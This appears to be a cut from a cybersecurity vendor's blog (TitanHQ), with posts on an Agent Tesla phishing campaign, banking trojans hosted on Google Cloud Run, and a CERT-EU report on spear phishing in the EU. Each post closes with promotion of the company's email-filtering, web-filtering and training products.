Agent Tesla allows commands to be run on compromised systems and is capable of stealing sensitive information, such as login credentials stored in browsers. The malware can also take screenshots, log keystrokes, and perform other malicious actions. The malware uses multiple layers of obfuscation to ensure it is not detected by antivirus solutions. The malware is commonly used to gain initial access to business networks, primarily through phishing campaigns. In this campaign, by impersonating a popular travel service company there is a reasonable chance that the user may have used the service in the past or have a current booking and will therefore open the email. Even if they have not, the reference to a charge on their credit card may be sufficient to get the user to open the attachment.

To protect against this and other malware distribution campaigns, businesses should ensure that they protect all endpoints with email security and antivirus solutions that are capable of behavioral analysis of files, as Agent Tesla and many other popular malware variants use obfuscation to bypass signature-based security solutions. Web filtering solutions provide added protection as they block connections to the malicious URLs that host malware and they can be configured to block downloads of executable files from the Internet. It is also important to provide security awareness training to the workforce to raise awareness of cyber threats and conduct phishing simulations to test the effectiveness of training.

TitanHQ offers a range of cybersecurity solutions for businesses and managed service providers to help them defend against cyber threats delivered via email and the Internet, including spam filtering with email sandboxing, web filtering, and security awareness training. Give the team a call today to find out more about improving your defenses against phishing and malware. All TitanHQ solutions are available on a free trial to allow you to test the products and see for yourself the difference they make.

Massive Phishing Campaign Leverages Google Cloud Run to Deliver Banking Trojans

A massive malware distribution campaign has been detected that uses phishing emails for initial contact with businesses and Google Cloud Run for hosting the malware. A variety of banking trojans are being distributed including Astaroth, Mekotio, and Ousaban. The campaign primarily targets countries in Latin America, and as such the majority of the phishing emails are in Spanish, but Italian versions have also been detected and there are indications that the campaign is spreading to other regions including Europe and North America.

The phishing emails used in this campaign appear to be legitimate invoices, statements, and communications from government and tax agencies and include a link that the recipient must click to view the attached invoice, statement, or demand. The link directs the user to services on Google Cloud Run, which is a popular service for hosting frontend and backend services and deploying websites and applications without having to manage infrastructure. Google Cloud Run has been used for hosting malware throughout 2023 but there was a massive spike in activity that started in September 2023 and has continued through January and February.

Over the past few months, Google’s service has been proving popular with cybercriminals for hosting malware as it is both cost-effective and is generally not blocked by security solutions. If a user clicks the email link, an MSI file is downloaded onto their device. MSI files are executable files, which in this case include embedded JavaScript that downloads additional files and delivers one or more banking trojans.

The banking trojans achieve persistence through LNK files in the startup folder that execute a PowerShell command on boot that runs the infection script. The banking trojans are capable of keylogging, clipboard monitoring, screenshots, credential theft, and traffic manipulation to direct users to cloned websites of financial institutions to capture banking credentials. The Astaroth banking trojan alone targets more than 300 financial institutions as well as cryptocurrency exchanges.

To protect against this and other malware distribution campaigns, businesses need to adopt a defense-in-depth approach and should implement multiple layers of protection. The first line of defense is a spam filter or email security solution to block the initial phishing emails. SpamTitan Plus is a leading-edge anti-spam service that provides maximum protection against malicious emails. The solution has better coverage, faster phishing link detections, and the lowest false positive rate of any product, which makes it the best spam filter for businesses and an ideal MSP spam filtering solution. In addition to including all leading phishing feeds to ensure the fastest possible detection of new phishing threats, SpamTitan Plus uses predictive analysis to identify suspicious URLs that have not yet been detected as malicious.

A web filter, such as WebTitan, can be used to control access to the Internet. Blocks can be placed on websites and certain categories of websites down to the user level, the solution prevents access to all known malicious URLs, and it can be configured to block file downloads from the Internet, such as MSI files and other executable files that are often used for malware delivery.

Cybercriminals often host malware on legitimate hosting platforms which are usually trusted by security solutions, which means malicious emails may be delivered to end users. It is therefore important to provide security awareness training for the workforce. Security awareness training raises awareness of the threats that employees are likely to encounter and teaches them security best practices to help them identify, avoid, and report cyber threats. Combined with phishing simulations, it is possible to greatly reduce susceptibility to phishing and malspam emails. Data from companies that use the SafeTitan security awareness training platform and phishing simulator shows susceptibility to phishing threats can be reduced by up to 80%.

If you are looking to improve your defenses against phishing and malware, give the TitanHQ team a call to find out more about these products and to help get you set up for a free trial to put these solutions to the test in your own environment.

Spear Phishing is the Most Common Method of Initial Access in the EU

A recent report from the Computer Emergency Response Team (CERT-EU) has provided insights into how EU organizations are being targeted by nation-state-sponsored actors and cybercriminal groups. The majority of nation-state activity has been linked to hacking groups in the Russian Federation and the People’s Republic of China, and while it is not always possible to determine the motives behind cyberattacks and intrusions, the majority of nation-state hacking activity is believed to be conducted to achieve cyberespionage objectives. The aim of these campaigns is to gain access to accounts/emails or servers where sensitive data is stored. Around 73% of all attacks within the EU are believed to be conducted for espionage purposes, with 16% of attacks conducted by hacktivists. Some of the hacktivism incidents are thought to be a front for nation-state activity.

In contrast to the United States, cybercriminal activity accounts for a low percentage of all malicious activity, with only 7% of intrusions attributed to cybercrime. CERT-EU reports that only a very limited number of cybercrime actors are conducting attacks within the EU, and the majority of that activity comes from ransomware groups. These groups gain access to internal networks, steal sensitive data, and encrypt files then demand payment to prevent the publication of the stolen data and for the keys to decrypt data.

In 2023, CERT-EU identified 55 ransomware operations that were active within the EU, and 906 victims were identified from data leak sites and open sources. It should be noted that not all ransomware attacks are reported and many companies quietly pay the ransom, so the true total could be substantially higher. Many of these attacks appeared to be opportunistic in nature rather than targeted. While there are many different ransomware groups, the most active in the EU were LockBit, Play, and BlackBasta, although in Q4 2023 there was a large increase in attacks by the 8Base group, with NoEscape also highly active in the second half of the year. Ransomware groups attacked a wide range of sectors, with manufacturing the worst affected with 24% of attacks, followed by legal/professional services (14%), and construction/engineering (12%).

A variety of methods were used to gain access to targeted networks. 104 software products were targeted, with these attacks often exploiting vulnerabilities in internet-facing products, or involving trojanized software, fake software, and abuse of the public package repositories used for programming languages. Some of the most significant attacks of the year involved networking products, such as Fortinet, Cisco, and Citrix products, as well as password managers such as 1Password or LastPass, content management and collaboration tools such as WordPress and Atlassian Confluence, and cloud services. While many attacks used these methods for initial access, by far the most common method was spear phishing for both cybercriminal and nation-state threat actors.

Spear phishing attacks include malicious links to websites where credentials are harvested or malicious attachments. There was a significant increase in spear phishing attacks that used lures related to EU affairs, and it was common for them to include decoy PDF files that were originally internal or publicly available documents related to EU policies, for example, documents relating to the Swedish Presidency of the Council of the European Union, the EU – Community of Latin American and Caribbean States (CELAC) Summit, and the Working Party of Foreign Relations Counsellors (RELEX). These campaigns were directed at individuals and organizations involved in EU policies, and the emails often impersonated staff members of union entities or the public administration of EU countries to add credibility. Public administration entities were the most targeted, followed by entities in diplomacy, defense, transport, finance, health, energy, and technologies. While spear phishing is usually performed via email, CERT-EU notes some diversification of communications, with attacks also conducted via social media networks, instant messaging services, and SMS messages.

Entities in the EU should implement layered defenses against the most common initial access vectors. An advanced email security solution should be implemented that is capable of signature and behavioral analysis of emailed files, with extensive threat intelligence feeds, and AI/machine learning capabilities. SpamTitan anti-spam software has all of these features and more and will protect your business from all types of email-based attacks. SpamTitan is offered as a cloud-based anti-spam service or can be provided as an anti-spam gateway for on-premises environments. A web filter such as WebTitan will protect against the internet-based component of cyberattacks by blocking access to malicious sites, and security awareness training and phishing simulations should be conducted on the workforce using a solution such as SafeTitan. To protect against unauthorized account access, multi-factor authentication should be implemented and software should be kept up to date with the latest updates and patches applied promptly.